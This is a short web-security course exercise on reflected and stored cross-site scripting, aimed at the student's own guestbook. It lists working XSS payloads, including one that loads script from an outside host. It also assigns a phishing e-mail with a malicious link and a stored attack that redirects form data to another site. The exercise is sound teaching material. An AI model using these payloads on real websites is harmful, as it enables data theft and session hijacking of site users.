Exercise: Cross Side Scripting?

Reflected XSS

Try the following inputs in your search for Guestbook (these examples come from the site ha.ckers.org/xss.html):

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

Write an HTML e-mail containing a reflected XSS link to your guestbook that changes the text of the title (the <h1 id='title'> one).

Stored XSS

Write a Stored-XSS attack (means add a new line in your guestbook that contains this attack) that changes the action of your search form and sends the information to another site that redirects finally to the right page (quite similar to the example for the login in the xss examples page).
Be carreful, some actions have to be done in the future, since the DOM is not finished yet when the javascript is executed.